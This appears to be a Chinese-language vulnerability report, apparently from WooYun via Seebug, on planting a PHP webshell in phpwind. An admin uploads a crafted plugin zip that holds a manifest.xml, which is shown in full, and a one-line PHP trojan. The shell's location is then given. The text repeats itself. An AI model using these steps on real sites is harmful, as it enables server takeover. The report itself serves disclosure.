### 简要描述: ### 详细说明: 后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell. 1.先制作一个安装包,需要包含一个manifest.xml文件和一个php一句话(此处文件名为php.php)。 manifest.xml如下: ``` <?xml version="1.0" encoding="gbk"?> <manifest> <application> <name>getshell</name> <alias>getshell</alias> <version>1.0</version> <pw-version>1.0</pw-version> <type>app</type> <description>getshell </description> <charset>gbk</charset> <website>http://wooyun.org</website> <author-name>VIP@wooyun</author-name> <author-email>root@wooyun.org</author-email> <author-icon>http://wooyun.org</author-icon> </application> <res>res</res> </manifest> ``` 将以上文件打包成zip格式。 2.在后台 云平台-》应用管理-》本地安装处上传制作好的安装包,并点击安装。 [<img src="https://images.seebug.org/upload/201306/11135759d93f1a6dfd627d9feb190542723e48a0.jpg" alt="p1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/11135759d93f1a6dfd627d9feb190542723e48a0.jpg) 3.shell为http://127.0.0.1/phpwind/src/extensions/getshell/php.php [<img...
### 简要描述: ### 详细说明: 后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell. 1.先制作一个安装包,需要包含一个manifest.xml文件和一个php一句话(此处文件名为php.php)。 manifest.xml如下: ``` <?xml version="1.0" encoding="gbk"?> <manifest> <application> <name>getshell</name> <alias>getshell</alias> <version>1.0</version> <pw-version>1.0</pw-version> <type>app</type> <description>getshell </description> <charset>gbk</charset> <website>http://wooyun.org</website> <author-name>VIP@wooyun</author-name> <author-email>root@wooyun.org</author-email> <author-icon>http://wooyun.org</author-icon> </application> <res>res</res> </manifest> ``` 将以上文件打包成zip格式。 2.在后台 云平台-》应用管理-》本地安装处上传制作好的安装包,并点击安装。 [<img src="https://images.seebug.org/upload/201306/11135759d93f1a6dfd627d9feb190542723e48a0.jpg" alt="p1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/11135759d93f1a6dfd627d9feb190542723e48a0.jpg) 3.shell为http://127.0.0.1/phpwind/src/extensions/getshell/php.php [<img src="https://images.seebug.org/upload/201306/11140130f797a526481f3c48c8eea34655242d38.jpg" alt="p2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/11140130f797a526481f3c48c8eea34655242d38.jpg) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201306/11140130f797a526481f3c48c8eea34655242d38.jpg" alt="p2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/11140130f797a526481f3c48c8eea34655242d38.jpg)